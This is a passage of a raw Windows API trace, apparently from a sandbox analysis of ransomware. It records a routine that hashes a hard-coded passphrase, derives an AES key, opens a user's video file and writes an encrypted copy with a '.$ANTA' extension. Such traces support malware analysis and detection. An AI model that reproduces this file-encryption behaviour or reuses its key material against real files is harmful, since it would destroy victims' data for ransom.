dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0106.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca7d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0106.435] CloseHandle (hObject=0x298) returned 1 [0106.437] FreeLibrary (hLibModule=0x772d0000) returned 1 [0106.437] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0106.437] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\kdyPGegxQAqdUuFtfW.mkv", lpFindFileData=0x144e3c8 | out: lpFindFileData=0x144e3c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd7fbae0, ftCreationTime.dwHighDateTime=0x1d5e2f4, ftLastAccessTime.dwLowDateTime=0x83865760, ftLastAccessTime.dwHighDateTime=0x1d5e9f0, ftLastWriteTime.dwLowDateTime=0x83865760, ftLastWriteTime.dwHighDateTime=0x1d5e9f0, nFileSizeHigh=0x0, nFileSizeLow=0x7644, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="kdyPGegxQAqdUuFtfW.mkv", cAlternateFileName="KDYPGE~1.MKV")) returned 0x41ac700 [0106.437] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0106.437] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0106.437] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0106.437] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0106.437] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0106.437] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0106.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796d88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0106.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0106.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797108, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0106.438] CryptAcquireContextA (in: phProv=0x144e0a8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e0a8*=0x41a5250) returned 1 [0106.438] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0106.438] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0106.438] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0106.438] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0106.438] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0106.438] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0106.439] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0106.439] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0106.439] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0106.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caf10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0106.439] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144de18 | out: phHash=0x144de18) returned 1 [0106.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0106.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0106.439] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0106.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0106.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0106.439] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0106.439] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0106.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cafb8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0106.439] CryptHashData (hHash=0x41ac140, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0106.439] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0106.439] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0106.439] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0106.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cada8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0106.440] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac140, dwFlags=0x1, phKey=0x144de18 | out: phKey=0x144de18*=0x41ac180) returned 1 [0106.440] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0106.440] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0106.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0106.440] CryptDestroyHash (hHash=0x41ac140) returned 1 [0106.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0106.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0106.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0106.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0106.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0106.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0106.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0106.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0106.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0106.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0106.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0106.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0106.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0106.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0106.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0106.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0106.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0106.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0106.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0106.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0106.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0106.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0106.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0106.441] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0106.441] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0106.441] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0106.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0106.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0106.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0106.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0106.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0106.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0106.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0106.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0106.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0106.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0106.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0106.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0106.442] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\kdyPGegxQAqdUuFtfW.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\kdypgegxqaqduuftfw.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0106.442] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.442] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e550 | out: lpNewFilePointer=0x0) returned 1 [0106.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0106.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0106.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0106.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0106.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0106.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0106.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0106.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0106.442] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0106.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0106.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0106.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0106.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0106.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0106.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0106.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0106.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0106.443] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0106.443] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0106.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0106.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0106.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0106.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0106.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0106.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0106.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0106.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0106.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0106.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0106.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0106.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0106.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0106.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0106.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0106.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0106.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0106.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0106.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0106.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0106.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0106.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0106.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0106.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0106.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0106.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0106.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0106.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe0) returned 0x19e5a98 [0106.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0106.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a8580 [0106.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0106.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a77b8 [0106.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5a98 | out: hHeap=0x1780000) returned 1 [0106.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0106.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0106.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0106.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0106.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0106.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a8580 | out: hHeap=0x1780000) returned 1 [0106.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0106.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0106.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0106.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0106.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a8628 [0106.444] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx")) returned 0x10 [0106.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a8628 | out: hHeap=0x1780000) returned 1 [0106.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0106.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a77b8 | out: hHeap=0x1780000) returned 1 [0106.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0106.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0106.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0106.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0106.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0106.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0106.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0106.445] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\kdyPGegxQAqdUuFtfW.mkv.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\kdypgegxqaqduuftfw.mkv.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0106.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0106.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0106.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0106.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0106.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0106.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0106.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0106.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0106.446] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0106.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0106.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0106.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0106.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0106.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0106.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0106.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0106.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0106.446] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0106.446] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, 